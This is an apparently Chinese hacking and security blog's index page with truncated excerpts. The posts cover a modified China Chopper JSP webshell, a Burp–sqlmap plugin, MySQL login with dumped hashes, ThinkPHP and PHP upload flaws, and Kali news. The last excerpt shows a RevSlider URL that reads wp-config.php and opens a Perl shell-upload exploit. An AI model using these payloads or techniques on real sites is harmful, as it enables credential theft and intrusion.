菜刀Jsp脚本增强版

   
分类:安全 | 2016-07-14 | 撸过 13,043 次
5人扯蛋

某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。
 
修复BUG:
 

1、初始化获取容器绝对路径错误如:原本路径是D:\wooyun菜刀连接默认跳转到了:D:\wooyun\wooyun目录。
2、修改了无法连接Oracle数据库问题
3、修改了远程下载代码
4、重新压了下代码

 

新的服务器端代码如下:

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>[......]

继续阅读

BurpSuite集成Sqlmap神器!

   
分类:工具 | 2016-06-30 | 撸过 2,666 次
0人扯蛋

设置很简单,这个已经是编译好的,只要在:extender-->extentions-->add 添加jar就OK了!

不过需要BurpSuite需要放到sqlmap根目录下!

本插件实现原理:

将目标请求的数据存放到临时文件中,然后调用"sqlmap.py -r $file"来启动对请求的sql注入检测 在Sqlmap tab中,你可以配置sqlmap除 -r外的其他参数,比如:
加入配置中写:"--level 3",真实执行时是:sqlmap.py -r $file --level 3
回到burpsuite主页面,在任何请求连接上右键,会看到新增"send to Sqlmap",点击后会开启cmd窗口,针对此请求进行sql注入检测

设置sqlmap参数:
[......]

继续阅读

韩国挫败了朝鲜黑客大规模网络攻击

   
分类:新闻 | 2016-06-29 | 撸过 1,772 次
0人扯蛋

最近的一份报告显示,朝鲜黑客入侵了超过160个韩国政府机构和企业的14万台计算机,并涉嫌在系统中种植了恶意软件,为其大规模的网络攻击做准备。

韩国调查朝鲜黑客行为

路透社报道,韩国警方对朝鲜黑客的网络攻击行为一直保持高度警戒,特别是朝鲜在1,2月份进行小型化氢弹试验和远程火箭试验之后。

韩国警察厅网络调查科表示,警方获得恶意代码情报之后展开了调查,结果发现一些大型企业,公共组织和政府机构在内的160多个机构使用的一款网络管理软件被朝鲜黑客攻破。该网络管理软件是由一家民间企业开发的,通过该系统,管理员可以远程操控多台电脑,统一进行软件升级和维护。而朝鲜黑客发现了这套系统中的漏洞,进而控制了[......]

继续阅读

免密码hash登陆mysql

   
分类:工具 | 2016-06-28 | 撸过 7,231 次
1人扯蛋

在获取到mysql用户的hash后,
可用hash直接登陆mysql进行操作
比如我们注入出数据库的hash,但是没办法拿到webshell
我们可以使用mysql_hash,用hash登陆并控制数据库
使用方法:

mysql_hash.exe -u root -p < 1.txt

Enter password: *****************************************
其中1.txt在同目录,内容为你想执行的sql语句,
比如:show databases;

[......]

继续阅读

Thinkphp 漏洞小结

   
分类:安全 | 2016-06-14 | 撸过 14,219 次
5人扯蛋

首先确定这个网站使用thinkphp的框架

国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢?

在URL后面加thinkphp的目录,也有可能爆出来

这是一个tankphp的网站目录。供参考

  • admin是后台工程文件夹
  • home是前台工程
  • public里面用于存放CSS文件,JS文件以及网页里面的图片
  • ThinkPHP框架
  • ueditor是百度编辑器

ThinkPHP的Ubb标签漏洞读取任意内容

http://w[......]

继续阅读

御剑web指纹识别

   
分类:工具 | 2015-08-24 | 撸过 4,787 次
0人扯蛋

御剑web指纹识别程序是一款CMS指纹识别小工具,该程序由.NET 2.0框架开发,配置灵活、支持自定义关键字和正则匹配两种模式、使用起来简洁、体验良好。在指纹命中方面表现不错、识别速度很快、但目前比较明显的缺陷是指纹的配置库偏少。

[......]

继续阅读

Kali2.0 正式发布

   
分类:安全 | 2015-08-23 | 撸过 1,448 次
0人扯蛋

Kali 2.0昨天已经在BlackHat 2015 USA上正式发布了。无论是粉丝们还是Kali官方都对这个2.0版本抱有极大的期待和热情。这是第一个基于Debian Jessie的Kali版本,此次升级最大的特点就是系统界面的设计理念更加先进,以及系统的升级方式变为滚动升级。

官方的Kali2.0介绍

1.将会保持滚动升级。
这是Kali 2.0最重要的更新,滚动升级的方式将会保证Debian的稳定性,同时保证Kali自身是个强有力的工具。
2.不断更新工具,工作流程将会极大增强。
3.Kali2.0的新史诗级皮肤
Kali2.0现在原生支持KDE, GNOME3, Xfce, MAT[......]

继续阅读

Google 镜像站

   
分类:安全 | 2015-07-20 | 撸过 2,215 次
2人扯蛋

转载自itechzero

2015.7.19 更新。新增谷歌学术列表!

原版:

https://guge.io/
https://goge.ml/
https://g.zyz.me/
https://g.wen.lu/
https://gg.avpn.cc/
https://cc.rrke.cc/
https://www.ko50.com/
https://g4w.me/
https://s.bt.gg/
https://hk.g.net.co/
https://www.booo.so/
https://duliziyou.com/
https://laoshandaoshi.so[......]

继续阅读

PHP任意文件上传漏洞

   
分类:安全 | 2015-04-18 | 撸过 3,806 次
2人扯蛋

漏洞细节:

这个漏洞存在于php中一个非常常用的函数中:move_uploaded_files,开发者总是用这个函数来移动上传的文件,这个函数会检查被上传的文件是否是一个合法的文件(是否是通过 HTTP 的 post 机制上传的),如果是合法的文件,则将它一定到指定目录中。

例子:

move_uploaded_file ( string $filename , string $destination )
这里的问题是,可以在文件名中插入空字符(之前多次修复过这个漏洞,比如CVE-2006-7243),利用插入空字符的方式,攻击者可以上传任意文件,引起远程代码执行漏洞等。

我这里用D[......]

继续阅读

WordPress幻灯片插件RevSlider漏洞利用

   
分类:安全 | 2015-04-18 | 撸过 3,746 次
0人扯蛋

任意读取:

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 

任意上传

#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Upda[......]

继续阅读